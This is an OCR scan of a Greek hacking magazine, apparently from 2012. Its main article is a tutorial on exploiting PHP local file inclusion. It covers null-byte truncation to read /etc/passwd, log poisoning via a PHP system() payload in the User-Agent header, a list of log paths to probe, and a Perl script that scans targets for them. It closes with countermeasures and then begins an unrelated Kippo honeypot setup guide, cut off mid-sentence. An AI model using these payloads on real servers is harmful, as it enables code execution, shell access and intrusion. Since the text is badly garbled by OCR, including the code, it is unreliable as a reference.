
</tr> 

<tr valign="top"> 

<td><table width="720" border-"0" cellpadding-"0" cellspacing="0"> 
<tr valign="top"> 


28:39 +0800] "GET /robots.txt HTIP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; 
800] "GET /. 
108.104 - - [22/Feb/201 7 40800] "GET 
7.200 - - [22/Feb/2012:00:53:52 +0800] "GET /' 
04.215 - - [22/Feb/2012:01:05:58 40800] "GET 
04.215 - 40800] "GET 
30800] "GET / 
3 40800] "GET 


19 40800] "GET / 
40 40800] "GET / 
47 40800] "GET / 
30800] "GET /. 
[22/Feb/2 30800] "GET 
55.251 - - [22/Feb/2012 :18 40800] "GET 
99.39 - - [22/Feb/2012:06:19:12 +0800] "GET / 
99.39 - - [22/Feb/2012: 06 40800] "GET / 
04.209 - - [22/Feb/2012 124 40800] "GET 
04.209 - - [22/Feb/2012 125 40800] "GET 
7.144 - - [22/Feb/2012: 59 40800] "GET / 
7.144 - - [22/Feb/2012:07:17:36 40800] "GET /. 
1.76 - - [22/Feb/2012:07:26:02 40800] "GET / 
8.196 - - [22/Feb/2012:08:55:17 40800] "GET / 
9.49 - - [22/Feb/2012:08:55:17 40800] "GET / 
0.41 - - [22/Feb/2012:09:14:30 40800] "GET /r 
0.41 - - [22/Feb/2012:09:14:31 40800] "GET /pi 
52.252 - - [22/Feb/2012: 
129.195 - - [22/Feb/201 
7.108 - - [22/Feb/2012: 
7.108 - - [22/Feb/2012: 
1.76 - - [22/Feb/2012:1 


09:43:11 40800] "HEAD 
11:21:56 40800] "GET 
:48:24 40800] "GET /. 
8:25 40800] "GET / 
20:50 40800] "GET / 
125.72 - - [22/Feb/2012:17:03:33 40800] "GET 
125.72 - - [22/Feb/2012:17:03:48 40800] "GET 
108.117 - - [22/Feb/2012:17:03:51 40800] "GET 
.13 - - [22/Feb/2012:17:15:29 10800] "GET /rol 
«223 - - [22/Feb/2012:19:35:12 40800] "GET /σι 


</p> 


<p aligne"center"»&nbsp;br»cimg J 


«/ta» 
</tr> 
</table></td> 


Σε αυτὀ ro site, ἑνα «νόμιμο» request yia τη σελἰδα µε τη φόρμα επικοι- 
voviag θα εἶχε την ακόλουθη µορφή: 


http://site.org/index.php?file-contact 


Παρατηρεἰστε ὁτι η τιµή της μεταβλητὴς file εἶναι η λέξη contact. Σε αυτή 
την τιµή, ο κὠδικας προσθέτει το «.php» και η συνένωση των δύο string 
αποτελεί την παράμετρο yia τη συνάρτηση include. Έτσι, µε αυτήν την 
τιµή yia τη μεταβλητὴ file, o server θα φορτώσει kavovikórara τη φόρμα 
επικοινωνἰας (contact.php). Ας δούμε ropa nog επηρεάζεται η δικἠ µας 
δουλειά, απὀ την αυτόματη προσθήκη της κατάληξης «.php». Av δίναμε 
στη μεταβλητἠ file την τιµή /etc/passwd, ro script θα προσπαθούσε να 
φορτώσει το αρχείο /etc/passwd.php και φυσικά θα αποτύγχανε. Ταυτό- 
xpova, θα αποτύγχανε και η προσπἀθειἁ µας να δούμε το αρχείο /etc/ 
passwd. Με λίγα λόγια, η αυτόματη προσάρτηση της κατάληξης «.php» 
θα µας εμπόδιζε και θα ἐμοιαζε να μπαλώνει την αδυναμἰα LFI. E, λοιπὀν, 
µε τη βοήθεια του χαρακτήρα 9600 (null byte) μπορούμε να ξεπεράσουμε 
αυτό το εμπόδιο άνετα! Με το συγκεκριµένο χαρακτήρα, ro string που 
σχηματίζεται απὀ τον κὠδικα θα τερματιστεί πριν προστεθεί η κατάληξη. 
Δείτε και πάλι ἑνα κατάλληλα κατασκευασμένο request: 


http://site.org/index.php?file-/etc/passwd7500 
Κατὰ το σχηματισμὀ της παραμέτρου yia τη συνάρτηση include, ro string 


Στην εικόνα pai- 
νεται TO access. 
log του δικού µας 
θύματος. Εκεί μέσα 
φυτέψαμε τον 
κὠδικά µας, τροπο- 
ποιώντας κατόλλη- 
λα ra headers του 
web browser. Έτσι, 
όπως θα δείτε 
σύντομα, καταφἑ- 
ραµε να κάνουμε 
στον Server Ó,TI 
περνούσε απὀ το 
μυαλὸ μας... 


To extension 
«Modify Headers» 
του Firefox εἶναι 
πολύ απλό στη 
χρήση. Στην εικόνα 
φαίνεται στιγµιό- 
τυπο απὀ τη δράση 
μας, kará το οποίο 
είχαμε αποδώσει 
στο UserAgent την 
τιμή «<? system('Is 
-[a^); 2»». Με 
αυτό τον τρόπο, 
ετοιµαζόμασταν va 
ρίξουμε µια ματιά 
στα αρχεία του 
web server... 
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θα τερματιστεὶ στον τελευταίο χαρακτήρα πριν το null byte. Έτσι, n npo- 
σθἠκη της κατάληξης «.php» θα ακυρωθεί και η συνάρτηση include θα 
φορτώσει τελικἀ το αρχείο /etc/passwd. Φοβερό, ἐτσι; 


Αξιοποίηση του [ΕΙ 


Εκμεταλλευόμενοι την αδυναμία LFI, μπορούμε να διαβάσουμε διάφορα 
αρχεία του συστήματος και να μάθουμε πράγματα που δεν θα ἐπρεπε. 
Το γεγονὸς auró --απὀ μόνο του-- αποτελεἰ cofapó κἱνδυνο για ἑναν 
server. Ωστόσο μπορούμε να κάνουμε και KATI πολύ πιο επικίνδυνο: Mno- 
ρούμε να εκτελέἐσουµε κὠδικα! Αναρωτιέστε noc µπορεί να γίνει κάτι 
τέτοιο; Σκεφτείτε ότι η συνάρτηση include βρίσκεται μέσα σε ¿va αρχείο, 
το οποίο διοχετεύεται στον interpreter της PHP. Επομένως, το αρχείο nou 
φορτώνουμε εκμεταλλευόμενοι την αδυναμία LFI, τοποθετείται μέσα σε 
ἑνα μεγαλύτερο αρχείο, το οποίο περνάει απὀ τον interpreter της PHP. 
Φανταστείτε λοιπὸν να φορτώσουμε ἑνα αρχείο, το οποίο περιλαμβάνει 
την ακόλουθη γραμμή: 


<? system('ls -1a); ?» 


Modify Headers 


e |[38- Googie 


CEGEEE E 


6 8 chrome://modifyheaders/content/preferences-tab.xul Αντ 


d- a πα 


$  * iÔ 


Stop Headers Options 


About Help 


[select action Y | | Header name (e.g. user-agent) 


| | Add 


] 
| [ Header value | [Descriptive comment 


Action Name 
Add User-Agent 


Value Comment Edit 


<? system(ls -la); 22 $ 
Delete 


Move to Top 


Move to Bottom 


Enable/Disable 


Enable All 


[ Disable Al.) 


8) Enabled 
8 Disabled 
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Ὅπως βλέπετε, η συγκεκριμένη γραμμὴ περιλαμβάνει κὠδικα σε PHP. Πα 
την ακρίβεια, περιλαμβάνει τη συνάρτηση system, η οποία επιτρέπει την 
εκτέλεση εντολών απὀ το σύστημα! Έτσι, όταν φορτωθεἰ auró το αρχεἰο, 
ο κὠδικάς που περιλαμβάνει θα εκτελεστεὶ anó τον interpreter της PHP 
κανονικότατα kai θα δούμε ro file listing του τρέχοντος καταλόγου. Τώρα, 
βέβαια, εἰμαστε σίγουροι ὁτι αναρωτιέστε και για κάτι ακόμα: Που θα 
βρούμε ἑνα αρχείο στον server, το οποίο να περιλαμβάνει *akpiBoc* τον 
κώδικα που θέλουμε; H απάντηση εἶναι ...πουθενἀ. Μπορούμε ωστόσο 


Αρχείο Επεξεργασία Προβολή Βοήθεια 


6.179 - - [22/Feb/2012:19:47:16 40800] "GET / RBDhp?FILE-/var/log/httpd/access log HITIP/1.1" 


-rw-r--r-- 1 0 May 29 2010 " 

-rw-r--r-- 1 0 May 29 2010 3 

drwxr-xr-x 8 4096 Feb 20 20:29 . 

drwxr-xr-x 11 root root 4096 Jan 13 2009 .. 

-rw-r--r-- 

μες 

-rw-r--r-- 

-IW-E--E--— php 
-rW-r--r-- 

drwxr-xr-x 

drwxr-xr-x 

EWeE--E--— 

drwxr-xr-x 

drwxr-xr-x 

drwxr-xr-x 

-rw-r--r-- 

-rw-r--r-- 

—EW-EÉ--E-- 

-rw-r--r-- 

—ÉW-E-—E-- 

-IfW-P--E-- 

CEWCE--E-— 

-rw-r--r-- 

GEWCE-OE-— 

-rw-r--r-- 

cENSE-E-- 

-rw-r--r-- 

-rw-r--r-- 

-—rw-r--r-- 

—PW-E--E-— hp 
-rfrw-r--r-- 

cEW-E--E--— 

-rwuw-r--r-- 

—EW-E--E--— 

-Ἐῑ--Ἐ------ 

-Ἐβ----ᾱ---- swf 
-rw-r--r-- 

-—EW-E--E-- 

-rw-r--r-- 

OGÉWCE-—E-— 

-rw-r--r-- b 
-fW-E--r-- 

EMI m-— p.php 
CEW-E--E-- 

-rw-r--r-- n.php 
OÉW-E-——E-- 

-rw-r--r-- 

-EWE-—-—Eg--— php 
-ÉW-E--E-— 

-σή-ᾱ---ᾱδ---- 

-rw-r--r-- 

=EW-p--p-- hp 
-rw-r--r-- 

—EW-E--£$-— 

-IW-r--r-- 

-ppa 

drwxr-xr-x 

"UEWCE-C-E-- 

-fW-r--r-- p 
EWCE--—E-—— -php 


4 


Ιδού το file listing, 
TOU τρέχοντος 
καταλόγου. 
Τουλάχιστον όσα 
μπορούμε να σας 
δείξουμε, για να 
μην εκθέσουµε τον 
server στον οποίο, 
χμ, εξασκηθήκα- 
με ;) 
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s-0-B-ü-mis- 


Hello World 


Ανάμεσα στα βασα- 
νιστήρια που υπο- 
βάλαμε το στόχο 
μας, τον υποχρεώ- 
caue να κατεβάσει 
την εικόνα hello. 
jpg. Αυτό ro πετύ- 
χαμε χρησιµοποιώ- 
ντας ro προγραμ- 
µατόκι curl (το 
wget δεν υπήρχε 
στον συγκεκρι- 
μένο server). Στη 
συνέχεια, ζητήσαμε 
απὀ τον browser 
va µας δείξει την 
κατεβασμένη £l- 
κόνα, óiaBácovrág 
την όμως anó τον 
server-aTÓóxo. 
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να ro κατασκευάσουµε μόνοι µας. Εδὠ όμως θα ἐλθει νέα ερώτηση: Πώς 
θα γράψουμε σε κάποιο αρχεἰο rou server; H αλήθεια εἶναι ὁτι εμεὶς δεν 
μπορούμε να κἀτι τέτοιο -- τουλάχιστον ὀχι ἄμεσα ;) Μπορεἰ όμως va το 
κάνει για εμάς o web server. Βλέπετε, κάθε φορά που εξυπηρετεἰται ¿va 
request, o web server καταγράφει τις σχετικὲς λεπτομέρειες σε διάφορα 
αρχεία log. Σε ἑνα απὀ αυτά τα αρχεία --και συγκεκριµένα στο access. 
log--, καταγράφεται ο UserAgent και διάφορα àAAa στοιχεία, που ne- 
ριλαμβάνονται στα headers που αποστέλλει o browser. Πιστεύουμε ὁτι 
φαντάζεστε που το πάμε... Προκειμένου να γράψουμε κατά βούληση κάτι 
Ἐεντόςξ του αρχείου access.log, αρκεἰ va τροποποιήσουµε ra headers 
που στέλνει στον Server o αγαπημένος µας web browser! Κάτι τέτοιο 
μπορεί να γίνει πολύ εὐκολα µε rov Firefox, χάρη oro extension ovópa- 
τι Modify Headers (https://addons.mozilla.org/el/firefox/addon/modify- 
headers). Me rr] βοήθεια αυτού rou extension μπορούμε, π.χ., να δώσουμε 
στο UserAgent την τιµή «<? system('Is -Ι8’); ?»». Ἔτσι, στο αρχεἰο Ka- 
ταγραφἠς του web server θα εμφανιστεί ο κὠδικάς µας! Πλέον, αρκεἰ να 
Φορτώσουμε το access.log, αξιοποιώντας την αδυναμία LFI και... Μπαμ! 
O server θα εκτελέσει τον κὠδικά µας (Σ.τ.Ε. Δεν ξέρω yiari, αλλά εγὠ 
avri yia «Μπαμ!» εἶδα va «KAPOW!»). Όπως αντιλαμβάνεστε, µε αυτή 
την τεχνικἠ μπορούμε να εκτελέσουμµε οτιδήποτε θέλουμε. Μπορούμε, 
π.χ., να εκτελέσουµε το wget και µε τη βοἠθειἁ του να κατεβάσουµε στον 
server va shell. Στη συνέχεια, µε την ἴδια τεχνικἠ μπορούμε να εκτελὲ- 
coupe το shell και να αποκτήσουμε πρόσβαση στη γραμμὴ εντολών του 
server. Από κει και ὑστερα, η απόκτηση root access εἶναι θέμα xpóvou 
και AN εἰχαμε, που ΠΟΤΕ δεν ἐχουμε, κακὲς προθέσεις, o server θα ταν 
τελειωμένος... 


Αρχεία καταγραφἠς 


Για va εκμεταλλευτούμε την αδυναμία LFI µε τον rpóno που μόλις nepi- 
γράψαμε, πρέπει va εντοπἰσουμε τα αρχεία καταγραφἠς του web server. 
Ὅμως, νωρἰτερα κι απὀ αυτό, πρέπει να έχουμε εντοπίσει την ύπαρξη της 
ευπάθειας LFI. Έτσι δεν εἶναι; Πα το σκοπὀ αυτό, αρκεἰ να κάνουμε δοκι- 
μὲς µε διάφορα requests, τα οποία να ζητούν µια ανύπαρκτη σελἰδα. Για 
παράδειγμα, μπορούμε να χρησιμοποιήσουμε requests σαν τα ακόλουθα: 


http://site.org/index.php?file-lfivulntest.php 
http://site.org/index.php?file-lfivulntest 


Εάν o server πάσχει απὀ την αδυναμία LFI θα προσπαθἠσει να φορτώσει 
τα αρχεία που του ζητήσαμε και, καθὼς δεν υπάρχουν, θα µας απαντήσει 


Server κερνάει, server πίνει! 
WI 


µε ἑνα μήνυμα λάθους. Ta σχετικἀ μηνύματα λάθους μοιάζουν µε αυτό: 


Warning: include() [function.include]: Failed opening 'testpage. 
php' for inclusion 


Έτσι, av δούµε κἀτι τἐτοιο µετά απὸ κάποια δοκιμή, θα γνωρίζουμε ὁτι 
ο στὀχος µας ἐχει την αδυναμία LFI! Μετά απὀ αυτό, μπορούμε va npo- 
χωρήσουμε στην αναζήτηση των αρχείων καταγραφἠς. Οι κλασικότερες 
θέσεις για ra log files nou µας ενδιαφέρουν φαίνονται παρακάτω: 


/apache/logs/error.log 
/apache/1logs/access.log 
/etc/httpd/logs/acces log 
/etc/httpd/logs/acces.log 
/etc/httpd/logs/error log 
/etc/httpd/logs/error.log 
/var/www/logs/access log 

/ var/www/logs/access.log 
../apache/1logs/error.log 
../apache/1logs/access.log 
./apache/1logs/error.log 
./apache/1logs/access.log 
./../apache/1logs/error.log 

./ ../apache/1ogs/access.log 

e... ../../etc/httpd/logs/acces log 
eM ef... /../etc/httpd/logs/acces.log 


bl A ο ος... 


Εδώ πρέπει να σημειώσουμε ὁτι η τεχνικἡ nou αναλύσαμε προηγουμένως 
µπορεί να εφαρμοστεἰ και µε το αρχείο error.log. Βλέπετε, o UserAgent 
καταγράφεται συνήθως *kai* σε auró το αρχείο. Βέβαια, για va γραφτεἰ 
κάτι εκεὶ μέσα θα πρέπει va ἐχουμε στείλει éva ἁκυρο (invalid) request. 
Έτσι, αν εντοπίσουµε το error.log κι αποφασἰσουµε να εργαστούμε µε 
αυτό, θα πρέπει να αλλάξουμε ελαφρώς την τακτικἠ µας. Θα πρέπει va 
στείλουμε ἑνα άκυρο request yia να φυτέψουμε τον κὠδικά µας στο 
error.log και στη συνέχεια θα ὅτείλουμε va request yia την εμφάνιση 
TOU error.log, ὥστε να εκτελεστεί o κὠδικας. Νομίζουμε ὁμως ὁτι το ἐχε- 
τε πιάσει και δεν χρειάζεται να σας ζαλίζουμε ἀλλο :) Εξάλλου, εφόσον 
έχουμε βρει κἄποιο στὀχο µετην αδυναμία LFI, το δύσκολο της υπόθεσης 
δεν αφορά στην εκμετάλλευσή της αλλά στον εντοπισμό των αρχείων 
καταγραφής. Όπως εἰδαμε, οι υποψήφιες θέσεις εἶναι αρκετὲς και πρέπει 
να κάνουμε πολλὲς δοκιμές. Μιλάμε για χαμαλοδουλειὰ! 


Αυτόματος εντοπισμός 


Εἱμαστε σίγουροι πως θα συμφωνήσετε μαζὶ µας: Το να ψάχνεις κάθε 
φορὰ την τοποθεσἰα ónou *evó£yerai* να βρίσκονται ra log εἶναι koupa- 
στικὀ -- για να µην πούμε εκνευριστικὀ. Μήπως θα μπορούσε να αυτοµμα- 
τοποιηθεἰ η όλη διαδικασία; Φυσικά και µπορεί! Αρκούν μερικὲς γραμμές 
κὠδικα σε Perl. Παρακάτω φαίνεται ro script nou γράψαμε εμεὶς για αυτἠ 
τη δουλειὰ και το οποίο μπορείτε να κατεβάσετε απὀ το http://bit.ly/ 
dheeelogs (H αρίθµηση των γραμμών ἐχει µπει για λόγους ευκολίας ανα- 
φορὰς και δεν αποτελεἰ μέρος του κὠδικα.) 
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01| £!/usr/bin/perl -w 

02| use LWP: :UserAgent; 

03 | 

04| $1og list - "15 logs.txt'; 

65| open(LOGS, $1og list) || die "Cannot open $log list: $!Wn'; 
06| Qlogs = «LOGS»; 

07| close(LOGS); 

θ8| 

09| print "^nEnter Target : "; 

10| chop ($target = <STDIN>); 

11| print "^nWith Null Poison Attack?\n"; print "y = yes | n = no : 5 
12| chop ($null = <STDIN>); 

13| $browser = LWP::UserAgent->new || die; 

14| &null_poison() if ($null eq "y"); 

15| &simple() if ($null eq "n"; 

16| 

17| sub simple ( 


18| foreach my $try (Qlogs) { 

19| chop($try); 

20| $response = $browser-»get($target.$try); 

21| if ($response-»content =~ /.*Mozilla.* | .*referer:.*/) ( 
22| print "\n\nBingo!! Success at $tryMn'; last; 

23| } 

24| print "\nFail at $try"; sleep(1); 

25| } 

26| } 

27| 


28| sub null poison ( 


29| $poison = "%00"; 

30| foreach my $try (@logs) { 

31| chop($try); 

32| $response = $browser->get($target.$try.$poison); 

33| if ($response-»content =~ /.*Mozilla.* | .*referer:.*/) ( 
34| print "\n\nBingo!! Success at $try$poisonWn'; last; 
35| ) 

36| print "AnFail at $try$poison"; sleep(1); 

37| ) 

38| } 


Server κερνάει, server πίνει! 
WT 


Ανάλυση rou κὠδικα 


Αρχικά, δηλώνουμε το module nou θα χρησιμοποιεί το πρὀγραμμὰ µας. 
Δουλειά του εἶναι να αποστέλλει αιτήματα σε web servers. Στη συνέχεια 
καταχωρούµε στη μεταβλητή Φίοα list το ὀνομα του αρχείου ΙΗ logs.txt. 
Ὅπως καταλαβαΐἱνετε, μέσα στο συγκεκριµένο αρχεἰο θα πρέπει να ἐχου- 
µε αραδιάσει τις πιθανὲς θέσεις για τα αρχεία καταγραφής. Αμέσως μετά, 
η μεταβλητἠ Φος list χρησιμοποιείται yia την ανάγνωση του αρχείου και 
τη φόρτωση των γραμμών του στον πἰνακα Glogs. 


Γραμμὲς 9-15: Εδὠ καθορίζονται ὀλες oi πρόσθετες πληροφορίες nou 
απαιτεί το πρὀγραμμα για να ξεκινήσει τη δουλειὰ του. Αρχικά, ζητά anó 
το χρήστη να δώσει το URL του στόχου και στη συνέχεια τον ρωτάει για 
το αν επιθυμεί να χρησιμοποιηθεὶ η μέθοδος Null Poison Attack. To URL 
του στόχου εἶναι ακριβώς εκεἰνο το οποίο επιτρέπει την προβολή αρχείων. 
Για παράδειγµα, θα μπορούσε να εἶναι το http://xyz.org/index.php?FILE-. 
H απάντηση του χρήστη, yia το av θα Χρησιµοποιηθεἰ η μέθοδος Null 
Poison Attack, αποθηκεύεται στη μεταβλητή $null. Λίγο αργὀτερα, ανά- 
λογα µε την τιμὴ της συγκεκριμένης μεταβλητής, καλεῖται eire η συνάρ- 
τηση simple eire η null. poison. 


Γραμμές 17-26: Εδὠ υλοποιείται ἑνας βρὀχος (foreach). Σε κάθε επανά- 
ληψη rou βρόχου, η μεταβλητή $try παίρνει pia απὀ τις τιμὲς του πἰνακα 
@logs. O βρὀχος τερματίζεται ὁταν η µεταβλητή $try σαρώσει ολόκληρο 
τον nivaka. Πα κάθε τιµή της $try, το πρὀγραμμα στέλνει στον server 
ἑνα κατάλληλο request και στη συνέχεια ελέγχει την απάντηση nou Aau- 
βάνει. Εάν η απάντηση περιλαμβάνει τις λέξεις «Mozilla» και «Referer»!, 
γνωρίζουμε ὁτι έχουμε εντοπίσει τα αρχεία καταγραφἠς rou web server. 
Σε αυτή την περίπτωση, ro πρὀγραμμα µας ενημερώνει για την επιτυχία 
και προβάλει την τρέχουσα τιµή της $try, δηλαδή τη θέση στην onoia 
εντοπἰστηκαν τα log file. Εάν η απάντηση rou server *ógv* περιλαμβάνει 
αυτὲς τις λέξεις, το πρόγραμμα περνάει στην επόμενη τιμὴ yia τη µετα- 
βλητἠ $try και συνεχίζει τις προσπάθειές του. 


Γραμμὲς 28-38: Αυτή η υπορουτίνα εἶναι παρόμοια µε την προηγούμε- 
νη. H μόνη διαφορὰ ἐγκειται στη μορφή rou request, το onoio anocT£A- 
λεται στον server. Σε αυτή την unopouriva, αµέσως μετὰ την τιµή της 
μεταβλητής $try προστίθεται ο χαρακτήρας 9600. Με άλλα λόγια, προστἰ- 
θεται ο χαρακτήρας Null και εφαρμόζεται η τεχνικἠ Null Poison Attack. 


Αντίµετρα 


Με τη βοήθεια του παραπάνω script μπορούμε va εντοπίσουμµε ἄνετα ra 
αρχεία καταγραφἠς ενὸς server που πάσχει ano LFI. Ἑτσι, εφαρμόζοντας 
τη τεχνική που περιγράψαμε νωρίτερα, μπορούμε τελικἁ va εκτελέσουµε 
κὠδικα στον Server και να πετύχουμε σχεδὸν οτιδήποτε θέλουμε! Εμεἰς 
βέβαια δεν εἱμαστε βάνδαλοι. Δεν εκπαιδευόµαστε για va καταστρέφου- 
HE ό,τι βρίσκουμε μπροστὰ µας, αλλά για να γινόμαστε καλύτεροι και να 
βοηθάμε και τους γύρω µας. Τώρα, λοιπὀν, θα πούμε δυο λόγια για το πῶς 
μπορεἰ να απαλλαγεὶ ἑνας server απὸ την αδυναμἰα LFI... 


Ὅπως θα 'χετε διαβάσει ξανά στο περιοδικὀ, οτιδήποτε προέρχεται απὀ 
το χρήστη πρέπει va αντιµετωπἰζεται oc ὑποπτο! Επομένως, οφείλουμε 
να ελέγχουμε καθετἰ το οποίο καθορἰζεται απὀ το χρήστη. Ένας anAóq 
τρόπος θα ἠταν va απαγορεύσουµε τους χαρακτήρες που πετυχαίνουν το 


1. Οι συγκεκριμένες λέξεις εμφανίζονται στα αρχεία καταγραφής. H πρώτη αποτελεί το UserAgent και υπάρχει 
σίγουρα στο access.log, ενώ η δεύτερη εμφανίζεται συνήθως στο error.log. 


To προγραμματά- 
ΚΙ µας σε δράση. 
Μετά απὀ μερικὲς 
προσπάθειες, 
εντόπισε το αρχείο 
καταγραφής καὶ 
μας ενημέρωσε yia 
τη θέση του. Εδώ 
που τα λέμε, δεν 
έκανε και τίποτα 
σπουδαίο. Μας 
απάλλαξε ωστόσο 
απὀ τις πολλαπλές 
και βαρετές δοκι- 
μές, τις οποίες θα 
έπρεπε να κάνουμε 
χειροκίνητα αν δεν 
το εἰχαμε! 


Bri Διαχειριστής: Γραμμή εντολών. 
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directory traversal. Κάτι τἐτοιο θα μπορούσε va γίνει µε την απομάκρυν- 
ση των χαρακτήρων «../» απὀ την τιµή της μεταβλητής που καθορίζει o 
Χρηῆστης: 

$file = $ GET[file]; 

$file = str replace("../", ", $file); 


Με auróv rov rpóno θα ξεμπερδεύαμε µια και καλὴ anó ro directory 
traversal. Σωστά; Λάθος! Το παραπάνω μπάλωμα θα μπορούσε va ano- 
τρέψει *uóvo* τους πρωτάρηδες. Ἑνας ἐμπειρος επιτιθἐµενος θα ἐδινε 
τους χαρακτήρες «../» σε 16δικἠ µορφή, κατάλληλη για χρήση σε URL, 
ἐτσι θα παρἑκαµμπτε το απλοϊκό µας φιλτράρισμα. Μια καλύτερη τακτικἠ 
για την προστασία rou server θα αποτελούσε ο ορισμός µιας λίστας, µε 
τις επιτρεπὀµενες τιμὲς για την «ευαἰσθητη» μεταβλητή. To script, αφού 
θα διάβαζε την τιµή της μεταβλητής που έδωσε ο χρήστης και πριν τη 
χρησιμοποιήσει κἄπου, θα ἐλεγχε av ἐχει κάποια anó τις προβλεπόμενες/ 
επιτρεπὀµενες τιμὲς: 


«?php 

$file = $ GET[file]; 

$safe files = array('index.php", "contact.php", "test.php"); 
if(in array($file, $safe files))( 


include($fille); 
) else ( 

echo "Ooops! Try again..."; 
} 
?> 


Όπως ακριβώς 
μοιραζόμαστε 
τον κώδικά µας, 


> έτσι θέλουμε να 
μοιραστούμε και 

— τις Ιδέες µας] 

hack Γιατί λοιπόν να 
ας erspoce.g9r μην To κάνουμε 
Αμπατιέλου 1l, Αθήνα ô 3x 
πλησίον ΗΣΑΠ Αγ. Ελευθέριος QTO κοντα; 


Ebooks Python UnitedTransnation 


Unauthorized Hackathons 
Awmn  SoftworeFreedomDay 


OpenLibrary  MozilloGreece 
Melissi Fedora Hackfests 
Arduino BookCrossing 
Hellug SysAdmin OpenGarden 
OpenDota Aeroponics µ[ρνό 

CreotiveCommons 


Μάθε περισσότερα για To hsor, το Πρόγραμμα Εκδηλώσεων 
και πως μπορείς και εσύ να συμμετέχεις: tJ hackertpoci pr 
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Eipaore σίγουροι πως η ιδέα των honeypots, 

τα onoia παρουσιάσαµε στο άρθρο που αρχίζει 
anó τη σελίδα 12 rou παρὀντος, σας κέντρισε το 

ενδιαφέρον και µε το παραπάνω! Κατανοητὸ κι 

αναμενόμενο, µιας και πρὀκειται yia éva πραγματικά 

E ξεχωριστὀ concept στον τομέα της ασφάλειας. Θα 

Q pa IQ S S E h O n eypot, χαρείτε επομένως µε το νέο OTI μπορείτε εὐκολα 
να στἠσετε µια διαδικτυακἠ nayióa στο οικιακὀ 

σας δίκτυο, χάρη στην οποία θα καταγράφετε 


LI LI 
aAAa γι a TO ση ITQ KI I τις κινήσεις οποιουδήποτε κακὀβουλου χρήστη 


επιχειρεί να σας επιτεθεί απὀ το Internet! 
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Πα να δημιουργήσουμε το δικὀ µας honeypot χρειάζονται οπωσδήποτε 
δύο πράγματα: Πρώτον, vav υπολογιστή που θα χρησιμοποιηθεί γι’ au- 
τὸν το σκοπὀ και, δεύτερον, το λογισμικὀ nou θα προσομοιώσει τη λει- 
τουργἱα µιας επιθυµητής, δικτυακἠς υπηρεσίας. 


O υπολογιστἠς αυτὸς µπορεἰ να 'vai eire µια φυσικἠ unxavrj που έχουμε 
ξεχασμένη kànou στο σπίτι εἰτε µια εικονικἠ μηχανή nou θα δημιουργἠ- 
coupe και θα τρέχουμε στο υπάρχουν μηχάνημά µας eire ἑνα VPS (βλ. και 
deltaHacker 005, σελ. 44). Για το δικὀ µας παράδειγµα, η διαδικασία θα 
πραγματοποιηθεἰ χρησιμοποιώντας µια εικονικἠ μηχανὴ (virtual machine, 
VM) που θα δημιουργηθεί µε τη βοήθεια του δημοφιλούς VirtualBox, σε 
φυσικὀ υπολογιστή (host machine) µε Windows 7. (Αν εἶστε νεοφερμένος 
στον κόσμο του virtualization γενικὀτερα ἠ/και rou VirtualBox ειδικὀτε- 
ρα, πριν συνεχίσουμε παροτρύνεστε να διαβάσετε σχετικὀ άρθρο που 
έχουμε δημοσιευμένο online -- και να δείτε τα συνοδευτικά screencasts: 
http://deltahacker.gr/2011/11/20/vbox-based-virtuallab.) 


To λογισμικὸ nou θα τρέχει ro guest OS του VM µπορεί va εἶναι κἄποιο 
απὸ ra διάφορα scripts που ¿xouv δημιουργηθεί για παρόμοιους σκοπούς, 
δηλαδή για στήσιμο honeypots. Αυτό που µας ενδιαφἑρει εἶναι να έχουμε 
£va σταθερὀ σχετικἁ λογισμικὀ που θα κάνει τη δουλειά µας, δε θα εἶναι 
δύσκολο va το ρυθµἰσουμε και ra αποτελἐσματά rou θα εἶναι εὐκολο va 
αναλύσουμε. 'Eva πρὀγραμμα λοιπὸν που πληροί αυτά τα κριτήρια εἶναι 
TO Kippo. Πρὀκειται για ἑνα medium interaction honeypot, δηλαδὴ ps- 
caiou επιπέδου αλληλεπίδρασης honeypot, το οποίο εἶναι Open Source 
και γραμμένο σε Python. To Kippo προσομοιώνει τη λειτουργία ενὸς SSH 
Server. Περισσότερα για αυτό µπορείτε να διαβάσετε στο 


http://kippo.googlecode.com 


Δημιουργία rou virtual machine 


Αρχίζουµε µε τη δηµιουργία της εικονικής unxavric n οποία θα στεγάσει 
το Kippo. To λειτουργικὀ σύστημα αυτής (guest OS) επιλἐξαµε va εἶναι 
η διανομή Ubuntu Server 11.10 32bit. Εσεὶς βέβαια μπορείτε va χρησι- 
µοποιήσετε µια διανομὴ της επιλογής σας, αλλά η συγκεκριμένη εἶναι 
υπεραρκετή για τη λειτουργία ενὸς honeypot, ενώ ταυτόχρονα δεν ἐχει 
μεγάλες απαιτήσεις. Θα πρέπει λοιπὸν να μεταβείτε στο site του Ubuntu 
και να κατεβάσετε το ISO της διανοµἠς στον υπολογιστή σας. AUTÒ, N.X., 
εἶναι το URL rou torrent file της εκδοχἠς 32bit: 


http://releases.ubuntu.com/11.10/ubuntu-11.10-server-i386.iso. 
torrent 


Η δημιουργία και η napaperponoinon µιας εικονικής µηχανής µε το 
VirtualBox δεν εἶναι δύσκολη υπόθεση, ενώ ἐχει παρουσιαστεἰ αναλυτικἁ 
και στο Site του περιοδικού: 


http://deltahacker.gr/?p-2667 


Ειδικἁ yia την προετοιμασία ενὸς VirtualBox VM και τη μετέπειτα εγκα- 
τάσταση rou Ubuntu Server για χρήση µε ro Kippo, παρακολουθήστε το 
screencast που φιλοξενούμε στο 


http://deltahacker.gr/?p-4799 
Ρύθμιση του συστήµατος 


Αφού εισέλθουµε για πρώτη φορὰ στο σύστημά µας, πρέπει να npay- 


Ώραίο SSH honeypot, αλλά yia το σπιτάκι | 
“0 


ματοποιήσουμε κάποιες προπαρασκευαστικὲς διεργασίες ὥστε va εἶναι 
λειτουργικὀ και να µην έχουμε αργότερα προβλήματα. Ξεκινάμε λοιπὸν 
αναβαθµίζοντας το σύστημα, κάτι που γενικότερα θα πρέπει να opovri- 
ζουμε ανά τακτά χρονικἁ διαστήματα: 


kippoghoneypot:-$ sudo apt-get update && sudo apt-get -y upgrade 


Συνεχίζουμε, θέτοντας σωστή ζώνη opag ὥστε η ηµεροµηνία και η opa 
να συμβαδίζουν µε τον πραγμµατικὀ κόσμο και το host machine. 


kippoghoneypot:-$ sudo dpkg-reconfigure tzdata 
Current default time zone: 'Europe/Athens' 

Fri Feb 24 22:44:34 EET 2012. 
Fri Feb 24 20:44:34 UTC 2012. 


τρίτο βήμα εἰναι να δώσουμε στο λειτουργικὀ στατικἠ διεύθυνση IP, WOTE 
